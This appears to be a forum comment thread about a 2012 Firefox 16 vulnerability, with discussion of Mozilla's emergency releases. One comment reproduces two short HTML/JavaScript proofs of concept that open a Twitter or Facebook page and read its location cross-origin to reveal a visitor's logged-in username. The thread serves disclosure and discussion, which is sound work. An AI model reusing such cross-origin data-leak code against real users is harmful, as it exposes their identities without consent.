by pittsburgh
4997 days ago
If you're curious like I was, you can find the details of the vulnerability described by Gareth Heyes at http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-yo... His proof-of-concept of the vulnerability can be found at http://www.businessinfo.co.uk/labs/firefox_knows_what_your_f... (Best fetched via curl... or Firefox 16.0 with an active Twitter session if you're daring.) Or you can just see the source here:

    <!doctype html>
    <script>
    function poc() {
      var win = window.open('https://twitter.com/lists/',
                            'newWin', 'width=200,height=200');
      setTimeout(function(){
        alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
      }, 5000);
    }
    </script>
    <input type=button value="Firefox knows" onclick="poc()">

edit: As others discovered, the regex stuff is an unnecessary red herring. Here's a simplified POC that uses Facebook to discover your vanity URL:

    <!doctype html>
    <script>
    function poc() {
      var win = window.open('https://facebook.com/profile.php',
                            'newWin', 'width=200,height=200');
      setTimeout(function(){
        alert('Hello ' + win.location);
      }, 5000);
    }
    </script>
    <input type=button value="Firefox knows" onclick="poc()">

|
|
There were chemspills for Firefox 13, 14, 15 and now 16. None of those seemed to be caused by the rapid development schedule; they were (IIRC) all issues discovered because the release had much wider exposure compared to beta.
On the other hand, Firefox now does silent updates, so if there hadn't been so much publicity about the Firefox release (or on the update being blocked), it might have been a non-event. In a few hours everyone will be on 16.0.1. I'm not sure if this would have happened to a non-open-source project, if we'd even hear about it.
Maybe we can make it clearer that "Beta" is really Mozillian for "Release Candidate"?